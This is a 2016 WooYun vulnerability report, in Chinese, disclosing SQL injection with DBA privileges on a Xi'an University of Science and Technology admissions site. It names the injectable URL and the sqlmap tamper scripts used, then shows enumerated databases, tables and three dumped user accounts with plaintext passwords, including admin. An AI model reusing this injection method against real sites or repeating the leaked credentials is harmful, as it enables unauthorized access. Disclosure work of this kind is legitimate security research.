当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170019

漏洞标题:西安科技大学某站存在SQL注入dba权限

相关厂商:西安科技大学

漏洞作者: 猪猪虾

提交时间:2016-01-17 15:39

修复时间:2016-03-06 14:18

公开时间:2016-03-06 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-06: 细节向公众公开

简要描述:

西安科技大学某站存在SQL注入dba权限

详细说明:

注入点:http://zs.xust.edu.cn/searchys.jsp?years=2013


使用脚本:charencode.py,apostrophemask.py


available databases [25]:
[*] CTXSYS
[*] HR
[*] KJDX
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
Database: KJDX
[35 tables]
+-------------------+
| PICTURE |
| QQ_TB_TMP |
| SYS_FUNC |
| SYS_JB |
| SYS_LINK |
| SYS_MODULE |
| SYS_ROLEAUTHORITY |
| SYS_USER |
| SYS_USERAUTHORITY |
| TD_SCHOOLLINK |
| T_CITY |
| T_COLL |
| T_FILE |
| T_INFO |
| T_INFOTYPE |
| T_KFCX |
| T_LYZX |
| T_PIC |
| T_PICTYPE |
| T_SPE |
| T_ZSJH |
| T_ZSJH_TEMP |
| T_ZSQK |
| T_ZSYS |
| ZS_LYDQDM |
| ZS_TD_KLDM |
| ZS_TD_KSLBDM |
| ZS_TD_MZDM |
| ZS_TD_PCDM |
| ZS_TD_WYYZDM |
| ZS_TD_XBDM |
| ZS_TD_ZZMMDM |
| ZS_T_JHK |
| ZS_T_TDD |
| ZS_XYZYDMB |
+-------------------+
Database: KJDX
Table: SYS_USER
[5 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| ID | NUMBER |
| LOGINNAME | VARCHAR2 |
| NAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| YHJB | NUMBER |
+-----------+----------+
Database: KJDX
Table: SYS_USER
[3 entries]
+-----+---------+------+------------+-----------+
| ID | NAME | YHJB | PASSWORD | LOGINNAME |
+-----+---------+------+------------+-----------+
| 1 | <blank> | 0 | xustzsbps | admin |
| 65 | lzp | 1 | n1sh1shu1a | lzp |
| 127 | ad | 2 | 159357as | zzz |
+-----+---------+------+------------+-----------+


注入1.png


注入2.png


注入3.png


注入DBA.png


dba权限

数据1.png


数据2.png


数据3.png


速度太慢不在深入测试!

漏洞证明:

注入DBA.png


数据2.png

修复方案:

过滤

版权声明:转载请注明来源 猪猪虾@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-22 09:06

厂商回复:

感谢提供漏洞信息!非常感谢!

最新状态:

暂无